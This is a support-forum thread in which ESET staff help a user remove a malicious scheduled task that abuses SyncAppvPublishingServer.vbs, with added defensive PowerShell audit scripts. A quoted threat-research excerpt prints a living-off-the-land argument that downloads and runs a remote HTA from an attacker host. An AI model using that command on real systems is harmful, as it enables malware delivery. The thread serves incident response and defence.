microbill (Author) posted June 15

Every time I boot my PC and login to Windows 10, I am given the message shown in the attached image. Please see thread: https://www.tenforums.com/general-support/205472-windows-script-host-issue-syncappvpublishingserver-vbs.html

Was pointed to a couple of threads here which seemed to indicate I could be dealing with a hidden trojan(?) Really hoping somebody would be able to point me in the right direction as some of the info in the threads below went over my head, and now I'm very concerned!

https://forum.eset.com/topic/32186-two-strange-powershell-processes-maybe-coinminers/page/2/
https://forum.eset.com/topic/32255-powershellagentaew-trojan-keeps-coming-back-after-cleaning-and-reboot/page/2/

microbill (Author) posted June 15

Inside NetService folder (attached screenshot)

Marcos (Administrators) posted June 15

C:\Windows\System32\SyncAppvPublishingServer.vbs is a legit system file not detected by ESET. Please provide logs collected with ESET Log Collector.

microbill (Author) posted June 15

Have attached the logs - thanks
Attachment: eis_logs.zip
itman posted June 15 (edited June 15 by itman)

Appears this might be related to: https://forum.eset.com/topic/32255-powershellagentaew-trojan-keeps-coming-back-after-cleaning-and-reboot/page/2/ . Have you checked the Eset Detections log for any PowerShell detection log entries related to this?

In any case, a NetService\Network scheduled task is not a legit Win scheduled task. Also, Windows is stating it can't find C:\Windows\System32\SyncAppvPublishingServer.vbs file. If this file does exist on your Windows installation, I suspect the attacker screwed up in coding the full path correctly in the NetService\Network scheduled task actions tab causing the Windows file not found alert that is appearing.

Marcos (Administrators) posted June 15

Scheduler executed C:\Windows\System32\WScript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" followed by a PowerShell script malware (detected as PowerShell/Agent.AEW), however, there was no such record in the Detections log most likely because the vbs script no longer existed on the disk and could not actually run. However, I could not find any reference to the vbs file neither in the registry nor WMI repository.

The system has been up for 12 hours. If you reboot, do you still get the message that the vbs file was not found? If so, please provide a Procmon boot log (saved unfiltered and compressed).

itman posted June 15 (edited June 15 by itman)

1 hour ago, Marcos said:
Scheduler executed C:\Windows\System32\WScript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" followed by a PowerShell script malware (detected as PowerShell/Agent.AEW), however, there was no such record in the Detections log most likely because the vbs script no longer existed on the disk and could not actually run.

I believe my original theory is correct and the command line text wscript.exe executed wasn't coded properly. Assumed is Eset is only going to process the command line text after it was parsed by wscript.exe. Something along this example;

Quote
I'm trying to write a script that manipulates its command line and then runs the command line. E.g.:
myscript.vbs "C:\Full Path\Program.exe" /option"Some option" "C:\Some file" /etc
which would then execute:
"C:\Full Path\Program.exe" /option"Some other option" "C:\Some other file" /etc
The problem is that VBScript doesn't allow access to the full command line like most other languages. Furthermore, the individual parameters get the quotes stripped, so WScript.Arguments returns:
C:\Full Path\Program.exe /optionSome other option C:\Some file /etc
https://groups.google.com/g/microsoft.public.scripting.vbscript/c/TyCgZkAUS5o
microbill (Author) posted June 16

5 hours ago, itman said:
Have you checked the Eset Detections log for any PowerShell detection log entries related to this?

Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
21/04/2023 3:25:41 PM;HTTP filter;file;https://www.tumbex.com/pgpxgopaqym.php;JS/Adware.Plugrush.B application;connection terminated;DESKTOP-8K3015I\Jack;Event occurred during an attempt to access the web by the application: C:\Program Files\Mozilla Firefox\firefox.exe (F0C67FC4D1EB285A3C76A23DC38BF228BD60EC66).;A566A6BB374BF7D46BD3FF941067F26F4FAC1390;

5 hours ago, Marcos said:
The system has been up for 12 hours. If you reboot, do you still get the message that the vbs file was not found? If so, please provide a Procmon boot log (saved unfiltered and compressed).

I get the same message every time I boot Windows. Bootlog attached! It's a .rar for compression reasons.
Attachment: Bootlog.rar

Marcos (Administrators) posted June 16

Did you stop logging after you got the error about missing SyncAppvPublishingServer.vbs? Since there's no reference to wscript.exe nor SyncAppvPublishingServer.vbs in the Procmon boot log, I assume that you stopped logging before the error.

itman posted June 16

Did you check if this file, C:\Windows\System32\SyncAppvPublishingServer.vbs, exists on your Windows installation? If it does not exist, open an admin level command prompt window. Then enter the following;

sfc /scannow

This will scan your Windows installation and replace/repair required Windows OS files. The scan will run for a while, so let it complete its processing. After the scan completes, verify if C:\Windows\System32\SyncAppvPublishingServer.vbs now exists.

microbill (Author) posted June 16

3 hours ago, itman said:
Did you check if this file, C:\Windows\System32\SyncAppvPublishingServer.vbs, exists on your Windows installation? If it does not exist, open an admin level command prompt window. Then enter the following; sfc /scannow This will scan your Windows installation and replace/repair required Windows OS files. The scan will run for a while, so let it complete its processing. After the scan completes, verify if C:\Windows\System32\SyncAppvPublishingServer.vbs now exists.

Do I want the file to (currently) exist if something is trying to use it for something other than its intended purpose?

11 hours ago, Marcos said:
Did you stop logging after you got the error about missing SyncAppvPublishingServer.vbs? Since there's no reference to wscript.exe nor SyncAppvPublishingServer.vbs in the Procmon boot log, I assume that you stopped logging before the error.

I stopped logging after the error popped up, although I didn't clear the error. I'll do it again.

microbill (Author) posted June 16

See attached bootlog. I cleared the error this time before opening Process Monitor and saving the log.
Attachment: Bootlog.rar

itman posted June 16 (edited June 16 by itman)

55 minutes ago, microbill said:
Do I want the file to (currently) exist if something is trying to use it for something other than its intended purpose?

I want you to verify that SyncAppvPublishingServer.vbs exists in C:\Windows\System32\ directory and post back your finding.

Marcos (Administrators) posted June 16

1 hour ago, microbill said:
See attached bootlog. I cleared the error this time before opening Process Monitor and saving the log.

This log is ok. Please run regedit and delete HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{22C947D6-7388-40A7-9A2C-0195436DE3EB}, then reboot the machine.
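The following is an added example, not code posted by Marcos or itman and not an ESET tool. It audits every scheduled task for the pattern the posts above describe: wscript/cscript launching SyncAppvPublishingServer.vbs with trailing arguments, or pointing at a script path that is missing on disk (the cause of the "cannot find script file" popup at logon), and maps each hit to its TaskCache registry entry so the GUID can be confirmed before anything is deleted. The task folder name (NetService\Network) and the TaskCache registry path come from the thread; the assumption that each key under TaskCache\Tree carries an "Id" value naming the matching TaskCache\Tasks entry is the standard Task Scheduler layout, and all function names are mine.

```powershell
# Added example, not code from this thread. Read-only audit; run from an
# elevated PowerShell prompt so every task folder is visible.

$ScriptName = 'SyncAppvPublishingServer.vbs'
$TreeKey    = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree'
$TasksKey   = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks'

function Get-TaskCacheId {
    # TaskCache\Tree mirrors the task folder hierarchy; each task's key holds
    # an "Id" value with the GUID used as the key name under TaskCache\Tasks.
    param([string]$TaskPath, [string]$TaskName)
    $leaf = Join-Path $TreeKey ($TaskPath.TrimStart('\') + $TaskName)
    (Get-ItemProperty -Path $leaf -Name Id -ErrorAction SilentlyContinue).Id
}

function Test-SuspiciousAction {
    # Returns a reason string when the action matches the pattern, else $null.
    param($Action)
    $exeName = [IO.Path]::GetFileName(([string]$Action.Execute).Trim('"'))
    if ($exeName -notmatch '^[wc]script(\.exe)?$') { return $null }

    $argString = [string]$Action.Arguments
    if ($argString -notmatch [regex]::Escape($ScriptName)) { return $null }

    # The first token (quoted or bare) is the script the host loads; anything
    # after it is what SyncAppvPublishingServer.vbs would hand on to PowerShell.
    if ($argString -notmatch '^\s*(?:"([^"]+)"|(\S+))(.*)$') { return $null }
    $scriptPath = if ($Matches[1]) { $Matches[1] } else { $Matches[2] }
    $scriptPath = [Environment]::ExpandEnvironmentVariables($scriptPath)
    $trailing   = $Matches[3].Trim()

    $reasons = @()
    if ($trailing) { $reasons += "trailing arguments: $trailing" }
    if (-not (Test-Path -LiteralPath $scriptPath)) { $reasons += "script not on disk: $scriptPath" }
    if ($reasons.Count -eq 0) { return $null }
    $reasons -join '; '
}

function Find-SuspiciousSyncAppvTasks {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            $reason = Test-SuspiciousAction $action
            if (-not $reason) { continue }
            $id = Get-TaskCacheId $task.TaskPath $task.TaskName
            [pscustomobject]@{
                Task      = $task.TaskPath + $task.TaskName
                State     = $task.State
                Execute   = $action.Execute
                Arguments = $action.Arguments
                Reason    = $reason
                CacheKey  = if ($id) { "$TasksKey\$id" } else { '(no entry under TaskCache\Tree)' }
            }
        }
    }
}

Find-SuspiciousSyncAppvTasks | Format-List
```

The CacheKey column is the registry entry Marcos's instruction targets, so the GUID can be checked against the flagged task before the key is removed. Where Task Scheduler still lists the task, Unregister-ScheduledTask removes the task XML and its cache entries together; the registry route is for entries the scheduler no longer shows.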
microbill (Author) posted June 16 (edited June 16 by microbill)

3 hours ago, itman said:
I want you to verify that SyncAppvPublishingServer.vbs exists in C:\Windows\System32\ directory and post back your finding.

No, it does not.

1 hour ago, Marcos said:
This log is ok. Please run regedit and delete HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{22C947D6-7388-40A7-9A2C-0195436DE3EB}, then reboot the machine.

The message no longer shows up!

itman posted June 16

1 hour ago, microbill said:
No, it does not.

I recommend you run sfc as I posted previously: https://forum.eset.com/topic/36704-windows-script-host-issue-syncappvpublishingservervbs/?do=findComment&comment=168082 . This should restore SyncAppvPublishingServer.vbs which is a legit Win OS file.

microbill (Author) posted June 17 (edited June 17 by microbill)

1 hour ago, itman said:
I recommend you run sfc as I posted previously: https://forum.eset.com/topic/36704-windows-script-host-issue-syncappvpublishingservervbs/?do=findComment&comment=168082 . This should restore SyncAppvPublishingServer.vbs which is a legit Win OS file.

The file does not show in the folder.

Of note, my custom Windows 10 theme has now reverted from the green/yellow/red buttons in above screenshot, to the standard Windows 10 buttons.

Marcos (Administrators) posted June 17

Strange, on my Win10 machine SyncAppvPublishingServer.vbs was restored after running sfc /scannow. Nevertheless, since it's not a file that you need and it's misused by malware, I'd suggest not to restore it unless you need it.

microbill (Author) posted June 17

Thank you. Should I run any other tests now aside from a normal Eset scan?

Marcos (Administrators) posted June 17

4 hours ago, microbill said:
Thank you. Should I run any other tests now aside from a normal Eset scan?

You can run a 2nd opinion scan with another AV (online scanner) but it's not necessary.

itman posted June 17 (edited June 17 by itman)

11 hours ago, microbill said:
The file does not show in the folder.

Did you reboot your PC before checking if SyncAppvPublishingServer.vbs was restored? Note the output message from the SFC scan.

itman posted June 17

Here's the malware attack details: https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/ . You stop crud like this by setting PowerShell to Constrained Language mode which prevents deployment of PowerShell subassemblies via .Net.
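An added example, not code posted by itman, that checks the setting he refers to: it reports the language mode of the current PowerShell session and probes whether an arbitrary .NET type can be instantiated, which is what Constrained Language mode denies to a script that lands on the machine. It then runs the same probe inside a separate runspace that has lowered itself to ConstrainedLanguage, so the effect can be seen without changing machine-wide policy. The function names and the choice of System.Net.WebClient as the probe type (not on the mode's core-type allow list) are mine.

```powershell
# Added example, not code from this thread. Read-only.

function Get-LanguageModeReport {
    $dotNet = 'allowed'
    try {
        # WebClient is not a Constrained Language core type, so New-Object
        # fails under that mode and succeeds under FullLanguage.
        $null = New-Object -TypeName System.Net.WebClient
    } catch {
        $dotNet = 'blocked'
    }
    [pscustomobject]@{
        LanguageMode    = $ExecutionContext.SessionState.LanguageMode
        ArbitraryDotNet = $dotNet
        PSVersion       = $PSVersionTable.PSVersion.ToString()
    }
}

function Test-ConstrainedLanguageEffect {
    # A session may move itself to a stricter language mode but never back,
    # so the probe is run in its own runspace that first lowers its mode.
    $probe = '$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"; ' +
             'try { $null = New-Object -TypeName System.Net.WebClient; "allowed" } catch { "blocked" }'
    $rs = [System.Management.Automation.Runspaces.RunspaceFactory]::CreateRunspace()
    $rs.Open()
    try {
        $ps = [System.Management.Automation.PowerShell]::Create()
        $ps.Runspace = $rs
        [void]$ps.AddScript($probe)
        [string]$ps.Invoke()[0]
    } finally {
        $ps.Dispose()
        $rs.Close()
    }
}

'Current session:'
Get-LanguageModeReport | Format-List
"Arbitrary .NET in a ConstrainedLanguage runspace: $(Test-ConstrainedLanguageEffect)"
```

Lowering the mode inside a session only lasts for that session; the report shows "FullLanguage" and "allowed" on a default Windows 10 install. Machine-wide enforcement comes from an application control policy (WDAC or AppLocker), under which every new PowerShell session starts in ConstrainedLanguage and the first probe reports "blocked".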
itman posted June 19 (edited June 19 by itman)

Another recent attack abusing SyncAppvPublishingServer.vbs is;

Quote
XWorm Delivered Through Tax Scam

FortiGuard Labs became aware of a curious-looking archive file hosted on an open directory on www[.]farmaciasmv[.]com/citrix/2022%20tax_documents[.]zip, which has since been removed. The zip file contains the following files:

Annual Withdrawal.xlsx (SHA2: 59bb292565ebc86800e5e4d625d3c19f98afe2261d3da1a8e2f9b45ec76153a0)
Robert tax_docs.pdf (SHA2: a9f4b054ea128529c62a8ff25f1439651f045e443adf5ff11fb5bd29f1333a7a)

The XLSX file is a benign decoy file that contains financial data from an unknown source. The other file is malicious. Despite Robert tax_docs.pdf having a PDF icon, it is different from what it seems. The file is actually a link (LNK) file that launches the legitimate script (C:\Windows\System32\SyncAppvPublishingServer.vbs), which has a known issue of taking command line arguments. The link file exploits this issue and feeds the legitimate script with the following command line argument to download and execute a remote "note.hta":

;\W_\*2\\\m_h_a_e ('http'+'://datacenter002[.]myftp[.]biz/documents/note.'+'hta')

The downloaded note.hta uses PowerShell to download another remote file hosted on hxxp://datacenter002[.]myftp[.]biz/documents/note[.]gif, which was not available at the time of our investigation. Finding another note.gif (SHA2: 0487ef401345aa17c6aaeac23151219863e1363f82fe76edd0066bbf3fb07715) based on the same infection chain let us continue our quest to the payload.

note.gif is a PowerShell script that creates the following files:

C:\Users\Public\onedrive.vbs (SHA2: 92C1767EE4A954B93D6AFA9AE83FE82B82D2867D919D0359DCF2C8DA75FB8C7C)
C:\Users\Public\test.vbs (SHA2: ADBA59F1495965684EEB4C5DAAD67F732FEB5E9183AE05EB869E20C88CAD7327)
C:\Users\Public\onedrive.ps1 (SHA2: 7A9705A424A634A321DB9F36B61D74B953A44D44EDC429F7641BF830870572FC)

Once launched, it executes the onedrive.vbs and test.vbs files.

Test.vbs creates %usertemp%\Note.txt, a clean file containing fake "QUARTERLY TAX PAYMENTS FOR 2022" data. Onedrive.vbs runs the previously created onedrive.ps1 filled with activities designed to hamper Windows Defender. The malware then proceeds to perform an AMSI bypass and totally trash Windows Defender protection mechanisms.

Full detailed analysis here: https://www.fortinet.com/blog/threat-research/tax-scammers-at-large

I do think it's about time Eset start warning about command line input on SyncAppvPublishingServer.vbs execution.
microbill (Author) posted June 19

On 6/17/2023 at 6:03 AM, itman said:
Did you reboot your PC before checking if SyncAppvPublishingServer.vbs was restored? Note the output message from the SFC scan.

I did, and have rebooted a handful of times this weekend and there is still no file. Should I be concerned? I worry that whatever this malware code was may be embedded somewhere else waiting to strike.

On 6/17/2023 at 7:56 AM, itman said:
Here's the malware attack details: https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/ . You stop crud like this by setting PowerShell to Constrained Language mode which prevents deployment of PowerShell subassemblies via .Net.

Thank you for this. To confirm, I should execute this code within Powershell?

I was going to ask if I should create a new User account on this W10 install and then deactivate the Administrator account but upon looking, the account I use is not the "Administrator" account.
itman posted June 19 (edited June 19 by itman)

1 hour ago, microbill said:
To confirm, I should execute this code within Powershell?

No! It's just an illustration of one method SyncAppvPublishingServer.vbs can be abused.

As far as SyncAppvPublishingServer.vbs missing from your Windows installation, I agree w/@Marcos that you should not be concerned about it. As best as I can determine, the only process that legitimately uses it is Office 2010 Access.